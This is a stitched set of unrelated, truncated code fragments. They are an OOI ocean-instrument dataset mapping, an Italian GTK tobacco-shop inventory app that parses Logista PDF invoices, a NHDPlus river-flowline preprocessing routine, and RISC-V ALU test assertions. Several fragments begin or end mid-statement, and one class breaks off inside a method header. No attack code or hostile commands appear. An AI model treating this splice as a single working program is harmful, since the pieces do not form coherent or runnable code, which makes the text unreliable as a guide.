var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE02SHSM' and node == 'NSIF' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE02SHSM/RID27/02-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
| |
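# A minimal sketch (not from the original script) of how the long chain of
# platform/node/instrument_class/method branches above could be collapsed into
# a single lookup table keyed by tuples; the dictionary name is illustrative.
METBK_RECOVERED_HOST = {
    ('CE07SHSM', 'BUOY', 'METBK1', 'RecoveredHost'):
        'CE07SHSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered',
    ('CE09OSSM', 'BUOY', 'METBK1', 'RecoveredHost'):
        'CE09OSSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered',
}
# uframe_dataset_name = METBK_RECOVERED_HOST[(platform_name, node, instrument_class, method)]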
#!/usr/bin/env python
#
# Copyright (C) <NAME> 2020 <<EMAIL>>
#
import datetime
import os
import re
import sqlite3
import subprocess
import sys
import tempfile
import xlrd
import xlwt
import base64
import locale
import gi
from . import browserWebkit2
from .browserWebkit2 import Browser
from . import config
from .config import log
from . import ordini
from . import preferencesTabacchi
from .preferencesTabacchi import prefs
from . import stampe
from . import stats
from . import utility
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, Gio, GLib, GdkPixbuf, Pango # noqa: E402
MENU_XML = """
<?xml version="1.0" encoding="UTF-8"?>
<interface>
<menu id="app-menu">
<submenu>
<attribute name="label">Tabacchi</attribute>
<section>
<item>
<attribute name="label">Importa documenti Logista...</attribute>
<attribute name="action">app.importa</attribute>
</item>
<item>
<attribute name="label">Ricalcola consumi...</attribute>
<attribute name="action">app.ricalcola</attribute>
</item>
<item>
<attribute name="label">Statistiche...</attribute>
<attribute name="action">app.statistiche</attribute>
</item>
</section>
</submenu>
<submenu>
<attribute name="label">Excel</attribute>
<section>
<item>
<attribute name="label">Genera inventario...</attribute>
<attribute name="action">app.excel</attribute>
</item>
<item>
<attribute name="label">Genera modello ordine...</attribute>
<attribute name="action">app.ordine_excel</attribute>
</item>
</section>
</submenu>
<submenu>
<attribute name="label">Stampe</attribute>
<section>
<item>
<attribute name="label">Etichette prezzi...</attribute>
<attribute name="action">app.etichette</attribute>
</item>
<item>
<attribute name="label">Elenco articoli...</attribute>
<attribute name="action">app.articoli</attribute>
</item>
</section>
</submenu>
<section>
<item>
<attribute name="action">app.preferences</attribute>
<attribute name="label" translatable="yes">_Preferences...</attribute>
</item>
<item>
<attribute name="action">app.about</attribute>
<attribute name="label" translatable="yes">_About</attribute>
</item>
<item>
<attribute name="action">app.quit</attribute>
<attribute name="label" translatable="yes">_Quit</attribute>
<attribute name="accel">&lt;Primary&gt;q</attribute>
</item>
</section>
</menu>
</interface>
"""
# Dialog for importing orders or invoices from the Logista web site
class ImportDialog(utility.GladeWindow):
ID_CODICE, ID_DESC, ID_PESO, ID_COSTO, ID_PREZZO_KG = (0, 1, 2, 3, 4)
POS_CODICE, POS_DESC, POS_PESO, POS_COSTO = (1, 2, 3, 5)
UNKNOWN, FATTURA, ORDINE = (-1, 1, 2)
TIPO_DOC = {FATTURA: "Fattura", ORDINE: "Ordine"}
modelInfoList = [
("Codice", "str", ID_CODICE),
("!+Descrizione", "str", ID_DESC),
("Peso", "float", ID_PESO),
("Costo", "currency", ID_COSTO),
(None, "currency", ID_PREZZO_KG)]
def __init__(self, parent):
super().__init__(parent, "importDialog.glade")
self.importDialog = self.builder.get_object("importDialog")
self.importDialog.set_transient_for(parent)
self.importTreeview = self.builder.get_object("importTreeview")
self.dataLabel = self.builder.get_object("dataLabel")
self.fileChooser = self.builder.get_object("fileChooserButton")
self.tipoDocLabel = self.builder.get_object("tipoDocLabel")
self.totaleKgLabel = self.builder.get_object("totaleKgLabel")
self.totaleEuroLabel = self.builder.get_object("totaleEuroLabel")
listino_formats = {self.ID_PESO: "%.3f kg"}
listino_properties = {self.ID_CODICE: {"xalign": 1, "scale": utility.PANGO_SCALE_SMALL},
self.ID_COSTO: {"xalign": 1, "scale": utility.PANGO_SCALE_SMALL}}
utility.ExtTreeView(self.modelInfoList, self.importTreeview, formats=listino_formats, properties=listino_properties)
self.importModel = self.importTreeview.get_model()
fileFilter = Gtk.FileFilter()
fileFilter.set_name("Pdf files")
fileFilter.add_pattern("*.pdf")
self.fileChooser.add_filter(fileFilter)
self.builder.connect_signals({"on_importDialog_delete_event": self.close,
"on_okButton_clicked": self.okClose,
"on_cancelButton_clicked": self.close,
"on_fileChooserButton_file_set": self.importDoc
})
self.dataOrdine = None
self.dataFattura = None
self.totalKg = 0
self.totalEuro = 0
self.result = None
self.tipo = self.UNKNOWN
self.tabacchiDict = self.__getTabacchiDict()
self.dataOrdineEntry = utility.DataEntry(self.builder.get_object("dataOrdineButton"), None, " %d %B %Y ")
# Build a dictionary with the current tobacco price list (ID -> [description, price per kg])
def __getTabacchiDict(self):
conn = None
cursor = None
tabacchiDict = None
try:
conn = prefs.getConn()
cursor = prefs.getCursor(conn)
cursor.execute("SELECT ID, Descrizione, PrezzoKg FROM tabacchi")
resultset = cursor.fetchall()
tabacchiDict = dict()
for row in resultset:
tabacchiDict[row["ID"]] = [row["Descrizione"], row["PrezzoKg"]]
except sqlite3.Error as e:
utility.gtkErrorMsg(e, self.importDialog)
finally:
if cursor:
cursor.close()
if conn:
conn.close()
return tabacchiDict
# Import a Logista document
def importDoc(self, widget):
(self.dataFattura, self.tipo, self.totalEuro, self.totalKg) = self.__importDoc(self.importModel, self.tabacchiDict)
self.totaleEuroLabel.set_text(locale.currency(self.totalEuro, True, True))
self.totaleKgLabel.set_text(locale.format_string("%.3f", self.totalKg))
if self.dataFattura:
self.dataLabel.set_text(self.dataFattura.strftime("%A %d %B %Y"))
self.dataOrdine = self.dataFattura - datetime.timedelta(days=prefs.ggPerOrdine)
self.dataOrdineEntry.setDate(self.dataOrdine)
else:
self.dataLabel.set_text("")
if self.tipo == self.UNKNOWN:
self.tipoDocLabel.set_text("")
else:
self.tipoDocLabel.set_text(self.TIPO_DOC[self.tipo])
# Import a Logista document (invoice or order) into the model passed as a parameter, using a dictionary to recognise the article codes
def __importDoc(self, model, tabacchiDict):
data = None
tipo = self.UNKNOWN
totalKg = 0
totalEuro = 0
filename = self.fileChooser.get_filename()
if not filename:
msgDialog = Gtk.MessageDialog(parent=self.importDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.CLOSE, text="Importazione non avvenuta.")
msgDialog.format_secondary_text("Seleziona un documento pdf.")
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
else:
model.clear()
row = [None] * model.get_n_columns()
tmpFile = tempfile.NamedTemporaryFile(delete=False)
tmpFile.close()
# Pass the arguments as a list so filenames containing spaces or shell
# metacharacters are handled safely
command = ["pdftotext", "-layout", filename, tmpFile.name]
try:
subprocess.check_call(command)
except Exception as e:
utility.gtkErrorMsg(e, self.importDialog)
return
# Check whether the document is a Logista invoice or a Logista order
fatturaPattern = re.compile(r".*- FATTURA U13 -.*")
ordinePattern = re.compile(r".*Numero ordine\s+\d+.*")
with open(tmpFile.name, 'r') as f:
for line in f:
if fatturaPattern.match(line):
tipo = self.FATTURA
break
elif ordinePattern.match(line):
tipo = self.ORDINE
break
if tipo != self.UNKNOWN:
if tipo == self.FATTURA:
headerPattern = re.compile(r"\s*CODICE\s+DESCRIZIONE\s+\S+\s+PREZZO\s+IMPORTO LORDO\s*")
datePattern = re.compile(r".*\s+(\d\d\.\d\d\.\d\d\d\d)\s*")
rowPattern = re.compile(r"^\s*1000*(\d+)\d{3}\s+(.*)\s+(\d+,\d+)\s+(\d+,\d+)\s+([0-9\.\,]+)\s*$")
ignorePattern = re.compile(r"\s*===\s+.*")
if tipo == self.ORDINE:
headerPattern = re.compile(r"\s*Riga\s+Cod\.AAMS\s+Descrizione\s+Quantità\s*")
datePattern = re.compile(r".*\s+(\d\d\.\d\d\.\d\d\d\d)\s*")
rowPattern = re.compile(r"\s*\d+\s+(\d+)\s+(.*)\s+(\d+,\d+)\s*")
ignorePattern = re.compile(r"\s*===\s+.*")
body = False
with open(tmpFile.name, 'r') as f:
for line in f:
# If we are not yet in the body of the document
if not body:
m = headerPattern.match(line)
# If the header is found, the body starts
if m:
body = True
elif not data:
m = datePattern.match(line)
if m:
data = datetime.datetime.strptime(m.group(1), "%d.%m.%Y")
# If we are in the body
else:
m = rowPattern.match(line)
# It is a standard row
if m:
idCod = m.group(1).strip()
peso = locale.atof(m.group(3))
costo = 0
prezzo_kg = 0
row[self.ID_CODICE] = idCod
row[self.ID_PESO] = peso
row[self.ID_DESC] = m.group(2).strip()
if tipo == self.FATTURA:
costo = locale.atof(m.group(5))
prezzo_kg = costo / peso
if idCod in tabacchiDict:
# row[self.ID_DESC] = tabacchiDict[idCod][0]
if tipo == self.ORDINE:
prezzo_kg = tabacchiDict[idCod][1]
costo = prezzo_kg * peso
row[self.ID_COSTO] = costo
row[self.ID_PREZZO_KG] = round(prezzo_kg, 3)
totalEuro += costo
totalKg += peso
model.append(row)
# If it is neither a standard row nor a row to ignore, the body has ended
elif not ignorePattern.match(line):
body = False
if not data or not model.get_iter_first():
data = None
model.clear()
msgDialog = Gtk.MessageDialog(parent=self.importDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.CLOSE, text="Importazione non avvenuta.")
msgDialog.format_secondary_text("Il documento pdf è un documento Logista?")
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
return data, tipo, totalEuro, totalKg
def run(self):
self.importDialog.run()
return self.result
def okClose(self, widget):
if not self.importModel.get_iter_first():
msgDialog = Gtk.MessageDialog(parent=self.importDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.OK, text="Non è stato importato alcun ordine.")
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
else:
self.result = [self.dataFattura, self.importModel, self.tipo, self.dataOrdine]
self.importDialog.destroy()
def close(self, widget, other=None):
self.importDialog.destroy()
# Dialog for choosing the order type
class U88Dialog(utility.GladeWindow):
def __init__(self, parent, data):
super().__init__(parent, "u88Dialog.glade")
self.u88Dialog = self.builder.get_object("u88Dialog")
self.u88Dialog.set_transient_for(parent)
self.straordinario = self.builder.get_object("straordinario_radiobutton")
self.urgente = self.builder.get_object("urgente_radiobutton")
self.dataEntry = utility.DataEntry(self.builder.get_object("dataButton"), data, " %d %B %Y ")
self.result = None
self.builder.connect_signals({"on_u88Dialog_delete_event": self.close,
"on_okButton_clicked": self.okClose,
"on_cancelButton_clicked": self.close
})
def run(self):
self.u88Dialog.run()
return self.result
def okClose(self, widget):
tipo = ordini.ORDINARIO
if self.straordinario.get_active():
tipo = ordini.STRAORDINARIO
elif self.urgente.get_active():
tipo = ordini.URGENTE
self.result = (tipo, self.dataEntry.data)
self.u88Dialog.destroy()
def close(self, widget, other=None):
self.u88Dialog.destroy()
class TabacchiDialog(utility.GladeWindow):
MAGAZZINO_TAB, LISTINO_TAB = (0, 1)
IN_MAGAZZINO, ID, DESCRIZIONE, TIPO, PREZZO_PEZZO, DECORRENZA, LIVELLO_MIN, PEZZI_UNITA_MIN, UNITA_MIN, PREZZO_KG, BARCODE, DIRTY = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11)
MODEL_INFO_LIST = [
("*Magazzino", "bool", IN_MAGAZZINO),
(None, "str", ID),
("^!+Descrizione", "str", DESCRIZIONE),
("^Tipo", "str", TIPO),
(None, "currency", PREZZO_PEZZO),
(None, "float", LIVELLO_MIN),
("*Pezzi", "int#3,0", PEZZI_UNITA_MIN),
("Unità min.", "float", UNITA_MIN),
("Prezzo Kg", "currency", PREZZO_KG),
(None, "str", BARCODE),
("^Decorrenza", "date", DECORRENZA),
(None, "bool", DIRTY)]
MODEL_INFO_LIST_MAGAZZINO = [
(None, "bool", IN_MAGAZZINO),
("Codice", "str", ID),
("!+Descrizione", "str", DESCRIZIONE),
("Tipo", "str", TIPO),
("Prezzo", "currency", PREZZO_PEZZO),
("*Livello", "float#3,3/i8,0,12", LIVELLO_MIN),
(None, "int", PEZZI_UNITA_MIN),
(None, "float", UNITA_MIN),
(None, "currency", PREZZO_KG),
("*Barcode", "str", BARCODE),
(None, "date", DECORRENZA),
(None, "bool", DIRTY)]
def __init__(self, parent):
super().__init__(parent, "tabacchiDialog.glade")
self.dirtyFlag = False
self.data = prefs.dataCatalogo
self.readBarcodeThread = None
self.barcodeDict = dict()
self.deleteList = []
self.tabacchiDialog = self.builder.get_object("tabacchiDialog")
self.tabacchiNotebook = self.builder.get_object("tabacchiNotebook")
self.bluetoothStatusImage = self.builder.get_object('bluetoothStatusImage')
self.listinoTreeView = self.builder.get_object("listinoTreeView")
self.magazzinoTreeView = self.builder.get_object("magazzinoTreeView")
self.tabacchiDialog.set_transient_for(parent)
listino_callbacks = {self.IN_MAGAZZINO: self.__toggledCallback, self.PEZZI_UNITA_MIN: self.onListinoCellEdited}
magazzino_callbacks = {self.BARCODE: self.onBarcodeCellEdited, self.LIVELLO_MIN: self.onCellEdited}
magazzino_properties = {self.ID: {"xalign": 1, "scale": utility.PANGO_SCALE_SMALL}, self.TIPO: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL}, self.BARCODE: {
"xalign": 1, "style": Pango.Style.ITALIC, "scale": utility.PANGO_SCALE_SMALL}, self.DECORRENZA: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL}}
listino_properties = {self.DESCRIZIONE: {"scale": utility.PANGO_SCALE_SMALL},
self.TIPO: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL},
self.DECORRENZA: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL}}
utility.ExtTreeView(self.MODEL_INFO_LIST, self.listinoTreeView, edit_callbacks=listino_callbacks, properties=listino_properties)
self.listinoModel = self.listinoTreeView.get_model()
self.magazzinoModel = self.listinoModel.filter_new()
self.magazzinoModel.set_visible_column(0)
utility.ExtTreeView(self.MODEL_INFO_LIST_MAGAZZINO, self.magazzinoTreeView, modelCallback=self.modelCallback,
edit_callbacks=magazzino_callbacks, properties=magazzino_properties)
# Detach the model from the TreeView before loading data into it
self.listinoTreeView.set_model(None)
self.magazzinoTreeView.set_model(None)
# Read the data from the database into the model
self.loadListino(self.listinoModel)
# Once the database read is finished, reattach the model to the TreeView
self.magazzinoTreeView.set_model(self.magazzinoModel)
self.listinoTreeView.set_model(self.listinoModel)
self.updateTitle()
self.listinoTreeView.connect("row-activated", self.changeView)
self.magazzinoTreeView.connect("row-activated", self.changeView)
self.builder.connect_signals({"on_tabacchiDialog_delete_event": self.forcedClose,
"on_updateButton_clicked": self.updateCatalogo,
"on_okButton_clicked": self.close,
"on_barcodeToolbutton_clicked": self.enableBarcode,
"on_cancelButton_clicked": self.forcedClose})
self.bluetoothStatusImage.hide()
def modelCallback(self, model):
return self.magazzinoModel
def onBarcodeCellEdited(self, widget, path, value, model, col_id):
self.__changeBarcode(value, path, model)
def onCellEdited(self, widget, path, value, model, col_id):
parent_path = model.convert_path_to_child_path(Gtk.TreePath.new_from_string(path))
parent_model = model.get_model()
parent_model[parent_path][col_id] = value
parent_model[parent_path][self.DIRTY] = True
self.dirtyFlag = True
def onListinoCellEdited(self, widget, path, value, model, col_id):
model[path][col_id] = value
model[path][self.DIRTY] = True
self.dirtyFlag = True
def __changeBarcode(self, barcode, path, model):
barcode = barcode.strip()
if (barcode in self.barcodeDict):
msgDialog = Gtk.MessageDialog(parent=self.tabacchiDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.OK, text="Codice a barre già associato:")
msgDialog.format_secondary_text("%s" % self.barcodeDict[barcode])
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
else:
parent_path = model.convert_path_to_child_path(Gtk.TreePath.new_from_string(path))
parent_model = model.get_model()
old_barcode = parent_model[parent_path][self.BARCODE]
if len(old_barcode) > 0:
del self.barcodeDict[old_barcode]
if len(barcode) > 0:
self.barcodeDict[barcode] = parent_model[parent_path][self.DESCRIZIONE]
parent_model[parent_path][self.BARCODE] = barcode
parent_model[parent_path][self.DIRTY] = True
self.dirtyFlag = True
def __toggledCallback(self, widget, path, | |
# comid routes to a single comid (likely most common case)
elif len(v) == 1:
tocomids[k] = v.pop()
# comid is an outlet
elif len(v) == 0:
tocomids[k] = 0
# comid routes to multiple comids (diversion)
else:
# downstream elevations
tocomids_c = list(v)
dnelevs = [div_elevs.get(toid, 99999) for toid in tocomids_c]
# downstream elevations unique to 2 decimal places
unique_dnelevs = set(np.round(dnelevs, 2))
# primary distributary
# if any of the downstream values are nans, or they are all the same
# keep the NHD main channel
if any(np.isnan(dnelevs)) or len(unique_dnelevs) == 1:
# Divergence == 1 is the main stem, Divergence == 2 is minor
# (see NHDPlus v2 User's Guide)
info = flcc.loc[tocomids_c, 'Divergence'].sort_values()
assert info.values[0] == 1
tocomids[k] = info.index[0]
#tocomids[k] = flcc.loc[tocomids_c, 'Divergence'].sort_values().index[0]
else:
tocomids[k] = np.array(tocomids_c)[np.nanargmin(dnelevs)]
# secondary distributaries
diversionminorcomids.update(v.difference({tocomids[k]}))
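# In short: at a divergence, route flow to the distributary whose sampled DEM
# elevation is lowest; if any downstream elevation is missing or they are all
# equal (to 2 decimal places), fall back to the NHDPlus main channel
# (Divergence == 1). The remaining distributaries are tracked as secondary
# (minor) distributaries.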
# update the routing graphs
# set tocomids to zero if there's no flowline
graph = {k: v if v in flcc.index else 0 for k, v in tocomids.items()}
graph_r = make_graph(list(graph.values()), list(graph.keys()))
flcc['tocomid'] = [graph.get(c, 0) for c in flcc.index]
# drop comids not in the model
diversionminorcomids = diversionminorcomids.intersection(flcc.index)
# drop comids that are routed to
# (aren't minor distributaries if they have another trib routing to them)
diversionminorcomids = diversionminorcomids.difference(flcc.tocomid)
# label secondary distributaries
flcc['main_chan'] = True
flcc.loc[diversionminorcomids, 'main_chan'] = False
# verify that all comids only route to one other comid
assert np.all([np.isscalar(v) for v in tocomids.values()])
logger.log('Determining routing at divergences using elevations sampled from the dem')
# Update comid start values using new routing
# use the 1st percentile elevation values to avoid outliers
# (spurious values in the DEM)
logger.log('Updating elevation values with 1st percentile sampled from the dem')
elevs = dict(zip(flcc.COMID, flcc['pct01']))
# update the elevations with any specified elevations
# for up elevations, update the elevations of the next lines upstream
if update_up_elevations is not None:
for comid, elev in update_up_elevations.items():
fromcomids = graph_r[comid]
for comid in fromcomids:
elevs[comid] = elev
# ensure that there aren't any lower elevations upstream
all_upstream_comids = get_upsegs(graph_r, comid)
for comid in all_upstream_comids:
if elevs[comid] < elev:
elevs[comid] = elev
# for dn elevations, update the elevation for that line
if update_dn_elevations is not None:
for comid, elev in update_dn_elevations.items():
elevs[comid] = elev
# ensure that there aren't any lower elevations upstream
# include any co-tributaries
tocomid = flcc.loc[comid, 'tocomid']
cotribs = set(flcc.loc[flcc['tocomid'] == tocomid].index)
all_upstream_comids = set()
for comid in cotribs:
elevs[comid] = elev
cotribs_upstream_comids = get_upsegs(graph_r, comid)
all_upstream_comids.update(cotribs_upstream_comids)
for comid in all_upstream_comids:
if elevs[comid] < elev:
elevs[comid] = elev
elevup = {}
cm_to_output_units = convert_length_units('cm', output_length_units)
# dictionary of NHDPlus minimum values converted to output units
elevslope_dict = dict(zip(elevslope.COMID, elevslope.MINELEVSMO * cm_to_output_units))
# screen for comids outside model
valid_comids = {k for k, v in elevs.items() if minelev < v < 1e5}
for tocomid, fromcomids in graph_r.items():
# if len(fromcomids) > 0:
fromcomids = fromcomids.intersection(valid_comids)
if len(fromcomids) > 0:
elevup[tocomid] = np.min([elevs[c] for c in fromcomids])
elif tocomid in valid_comids:
elevup[tocomid] = elevs[tocomid]
flcc['elevup'] = [elevup.get(c) for c in flcc.index]
flcc['elevdn'] = [elevs[c] if -10 < elevs[c] < 1e5 else elevslope_dict[c] for c in flcc.index]
noelevup = np.isnan(flcc.elevup)
flcc.loc[noelevup, 'elevup'] = flcc.loc[noelevup, 'elevdn']
logger.log('Updating elevation values with 1st percentile sampled from the dem')
# smooth segment end values so that they never rise downstream
logger.log('Smoothing updated elevations')
elevminsmo, elevmaxsmo = smooth_elevations(flcc.index.values, flcc.tocomid.values,
flcc.elevdn.values, flcc.elevup.values)
flcc['elevupsmo'] = [elevmaxsmo[c] for c in flcc.index]
flcc['elevdnsmo'] = [elevminsmo[c] for c in flcc.index]
# verify that end values are less than or equal to start values
assert np.all(flcc.elevdnsmo <= flcc.elevupsmo)
# verify that values don't rise at segment connections
elevupsmo = dict(zip(flcc.index, flcc.elevupsmo))
nextup = np.array([elevupsmo.get(graph.get(c, -10), -10) for c in flcc.index])
assert np.all(nextup <= flcc.elevdnsmo.values)
logger.log('Smoothing updated elevations')
# subtract secondary distributaries
nhdplus_asums = dict(zip(pfvaa.index, pfvaa.ArbolateSu))
fl_lengths = fl.LENGTHKM.to_dict()
logger.log('Recomputing arbolate sums')
# NHDPlus asums are the default
asum_calc = nhdplus_asums.copy()
# recompute the arbolate sums so that minor distributaries start at 0
# only recompute at minor distributaries because of missing lines (that have already been culled)
# also issues with double-counting asums from distributaries along the model edge
new_minor_distrib_asums = recompute_asums_for_minor_distribs(diversionminorcomids,
fl_lengths,
graph, graph_r)
asum_calc.update(new_minor_distrib_asums)
# recompute arbolate sums at and downstream of places where it decreases
# decreases are caused by routing connections that were not in NHDPlus
fixed_invalid_asums = fix_invalid_asums(asum_calc, fl_lengths, graph, graph_r)
asum_calc.update(fixed_invalid_asums)
flcc['asum_calc'] = [asum_calc[c] for c in flcc.index]
logger.log('Recomputing arbolate sums')
# cull flow paths below minor distributaries
# until they reach the arbolate sum threshold
logger.statement('Culling minor distributary flowlines < {} km from divergence...'.format(asum_thresh))
to_drop = flcc.loc[flcc.asum_calc < asum_thresh, :].index
flcc.drop(to_drop, axis=0, inplace=True)
flcc['asum_diff'] = flcc.nhd_asum - flcc.asum_calc
# estimate channel width using arbolate sum relationship
logger.statement('Populating channel widths...')
logger.statement('width = {} * arbolate sum (meters) ^ {}'.format(width_from_asum_a_param,
width_from_asum_b_param))
flcc['width1asum'] = width_from_arbolate_sum(flcc['asum_calc'].values - flcc['LENGTHKM'].values,
a=width_from_asum_a_param,
b=width_from_asum_b_param,
minimum_width=minimum_width,
input_units='km', output_units=output_length_units)
flcc['width2asum'] = width_from_arbolate_sum(flcc['asum_calc'].values,
a=width_from_asum_a_param,
b=width_from_asum_b_param,
minimum_width=minimum_width,
input_units='km', output_units=output_length_units)
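# Worked example with hypothetical parameters (not the module defaults): with
# a = 0.5 and b = 0.6, an arbolate sum of 100 km (1e5 m) would give
# width = 0.5 * (1e5 ** 0.6) ~= 0.5 * 1000 = 500 in the output length units.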
if narwidth_shapefile is not None:
if not os.path.exists(narwidth_shapefile):
raise IOError("narwidth_shapefile: {} not found!".format(narwidth_shapefile))
# sample widths for wider streams from NARWidth
logger.log('Sampling widths from NARWidth database')
logger.log_package_version('rtree')
narwidth_crs = get_crs(narwidth_shapefile)
narwidth_bounds = project(flowline_bounds, flowline_crs, narwidth_crs)
sample_NARWidth(flcc, narwidth_shapefile,
waterbodies=waterbody_shapefiles,
filter=narwidth_bounds,
crs=project_crs,
output_width_units=output_length_units)
logger.log('Sampling widths from NARWidth database')
flcc['width1'] = flcc.width1asum
flcc['width2'] = flcc.width2asum
frac_narwidth = np.sum(~np.isnan(flcc.narwd_mean))/len(flcc)
logger.statement('Flowline widths estimated from arbolate sum: {0:.1%}'.format(1-frac_narwidth), log_time=False)
logger.statement('Flowline widths sampled from NARWidth: {0:.1%}'.format(frac_narwidth), log_time=False)
flcc.loc[~np.isnan(flcc.narwd_mean), 'width1'] = flcc.loc[~np.isnan(flcc.narwd_mean), 'narwd_mean']
flcc.loc[~np.isnan(flcc.narwd_mean), 'width2'] = flcc.loc[~np.isnan(flcc.narwd_mean), 'narwd_mean']
if active_area is not None:
flcc = clip_flowlines_to_polygon(flcc, active_area,
flowlines_epsg=project_epsg,
simplify_tol=100, logger=logger)
# write output files; record timestamps in logger
logger.statement('writing output')
df2shp(flcc.drop('buffpoly', axis=1),
'{}/flowlines_gt{:.0f}km_edited.shp'.format(outfolder, asum_thresh),
index=False, epsg=project_epsg)
logger.log('Preprocessing Flowlines')
return flcc
def clip_flowlines_to_polygon(flowlines, polygon,
flowlines_epsg=None, crs=None,
simplify_tol=100, logger=None):
"""Clip line features in a flowlines DataFrame to polygon
features in polygon.
Parameters
----------
flowlines : DataFrame
Output from :func:`~sfrmaker.preprocessing.preprocess_nhdplus`
crs : obj
Coordinate reference system of flowlines. Only needed if
the data do not have a valid ESRI projection (.prj) file.
A Python int, dict, str, or :class:`pyproj.crs.CRS` instance
passed to :meth:`pyproj.crs.CRS.from_user_input`
Can be any of:
- PROJ string
- Dictionary of PROJ parameters
- PROJ keyword arguments for parameters
- JSON string with PROJ parameters
- CRS WKT string
- An authority string [i.e. 'epsg:4326']
- An EPSG integer code [i.e. 4326]
- A tuple of ("auth_name": "auth_code") [i.e ('epsg', '4326')]
- An object with a `to_wkt` method.
- A :class:`pyproj.crs.CRS` class
By default, None
polygon : str
Polygon shapefile, shapely polygon or list of shapely polygons of model active area. Shapely polygons
must be in the same CRS as flowlines; shapefiles will be automatically reprojected.
simplify_tol : float
Simplification tolerance for ``polygon`` to speed clipping.
See :doc:`shapely:manual` for more details.
logger : Logger instance
Returns
-------
flc : clipped flowlines dataframe
"""
if logger is None:
logger = Logger()
# read in the active area and to_crs to same crs as flowlines
flowlines_crs = None
if flowlines_epsg is not None:
flowlines_crs = get_crs(epsg=flowlines_epsg, crs=crs)
active_area_polygon = read_polygon_feature(polygon, flowlines_crs)
# simplify polygon vertices to speed intersection testing
# (can be very slow for polygons generated from rasters)
active_area_polygon = active_area_polygon.buffer(simplify_tol).simplify(simplify_tol)
logger.log('Culling flowlines outside of {}'.format(polygon))
lines = flowlines.geometry.tolist()
print('starting lines: {:,d}'.format(len(lines)))
intersects = [g.intersects(active_area_polygon) for g in lines]
flc = flowlines.loc[intersects].copy()
flc['geometry'] = [g.intersection(active_area_polygon) for g in flc.geometry]
drop = np.array([g.is_empty for g in flc.geometry.tolist()])
if len(drop) > 0:
flc = flc.loc[~drop]
print('remaining lines: {:,d}'.format(len(flc)))
logger.log('Culling flowlines outside of {}'.format(polygon))
return flc
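# Hypothetical usage sketch (shapefile name and EPSG code are illustrative,
# not from the original source):
# clipped = clip_flowlines_to_polygon(flowlines, 'active_area.shp',
#                                     flowlines_epsg=5070, simplify_tol=100)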
def sample_NARWidth(flowlines, narwidth_shapefile, waterbodies,
filter=None,
flowlines_epsg=None, crs=None,
output_width_units='meters',
outpath='shps/'):
"""
Sample the North American River Width Database by
doing a spatial join (transfer width information from
NARWidth shapefile to flowlines shapefile based on proximity).
Parameters
----------
flowlines : DataFrame
flowlines dataframe from preprocess_nhdplus().
Flowlines must be in a projected Coordinate reference system (CRS).
narwidth_shapefile : str
Path to shapefile from the NARWidth database (Allen and Pavelsky, 2015).
waterbody_shapefiles : str or list of strings, optional
Path(s) to NHDPlus NHDWaterbody shapefile(s). Only required if a
| |
res = ex.alu(opcode=0b00100, rs1=0x21212121, rs2=0, imm=14, pc=0, f3=0b101, f7=0)
assert res == 0x00008484
# SRAI
res = ex.alu(opcode=0b00100, rs1=0x7fffffff, rs2=0, imm=0, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x7fffffff
res = ex.alu(opcode=0b00100, rs1=0x7fffffff, rs2=0, imm=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x3fffffff
res = ex.alu(opcode=0b00100, rs1=0x81818181, rs2=0, imm=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xc0c0c0c0
res = ex.alu(opcode=0b00100, rs1=0x81818181, rs2=0, imm=7, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xff030303
res = ex.alu(opcode=0b00100, rs1=0x81818181, rs2=0, imm=31, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xffffffff
# ADD
res = ex.alu(opcode=0b01100, rs1=0x42, rs2=0x4593, imm=0, pc=0, f3=0b000, f7=0)
assert res == 0x45D5
# SUB
res = ex.alu(opcode=0b01100, rs1=0, rs2=0, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=1, rs2=1, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=3, rs2=7, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0xfffffffc
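# (3 - 7 = -4, which is 0xfffffffc in 32-bit two's complement)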
res = ex.alu(opcode=0b01100, rs1=0, rs2=0xffff8000, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x00008000
res = ex.alu(opcode=0b01100, rs1=0, rs2=0x00007fff, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0xffff8001
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, rs2=0xffff8000, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x80007fff
# SLL
res = ex.alu(opcode=0b01100, rs1=1, rs2=0, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x00000001
res = ex.alu(opcode=0b01100, rs1=1, rs2=1, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x00000002
